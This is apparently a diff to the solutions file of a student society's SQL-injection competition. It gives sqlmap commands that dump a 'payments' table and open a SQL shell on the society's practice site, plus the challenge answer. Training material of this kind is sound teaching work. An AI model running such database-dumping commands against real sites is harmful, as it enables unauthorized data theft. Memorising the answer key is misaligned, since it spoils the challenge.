CyberSoc-Newcastle/sql-injection-competition/competition/solutions.md

 __Solution:__

-Using the 'Rent a Boat' page from [question 5](#question-5), you could use the command `sqlmap.py -u "https://sql.cybersoc.org.uk/members/rent?category=Jet+Ski" --cookie "<COOKIE_VALUE>" -D geordie_boat_rentals_ltd -T payments --dump` to see what the table contained.
+Using the 'Rent a Boat' page from [question 5](#question-5), you could use the command `sqlmap -u "https://sql.cybersoc.org.uk/members/rent?category=Jet+Ski" --cookie "<COOKIE_VALUE>" -D geordie_boat_rentals_ltd -T payments --dump` to see what the table contained.

 This would have returned 126 rows from the table.
 Just using the dump command is not enough to find the sum of all the money in the `payments` table.
-To easily calculate the sum, you could run the command `sqlmap.py -u "https://sql.cybersoc.org.uk/members/rent?category=Jet+Ski" --cookie "<COOKIE_VALUE>" --sql-shell`.
+To easily calculate the sum, you could run the command `sqlmap -u "https://sql.cybersoc.org.uk/members/rent?category=Jet+Ski" --cookie "<COOKIE_VALUE>" --sql-shell`.
 This would open a SQL shell, which you could run SQL commands.

 In the SQL shell, you could run the SQL command `SELECT SUM(money) FROM payments;`.
 This would return the sum of the money, __569221__, contained in the money column of the `payments` table.